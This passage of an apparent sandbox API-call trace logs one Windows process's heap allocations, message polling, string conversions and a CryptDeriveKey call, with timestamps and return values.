HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0184.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0184.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0184.304] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0184.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.305] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0184.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0184.306] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.306] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0184.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0184.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0184.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50aa0 [0184.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50aa0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.310] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa875d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87050) returned 1 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0184.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0184.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0184.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0184.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0184.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0184.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0184.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0184.315] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, 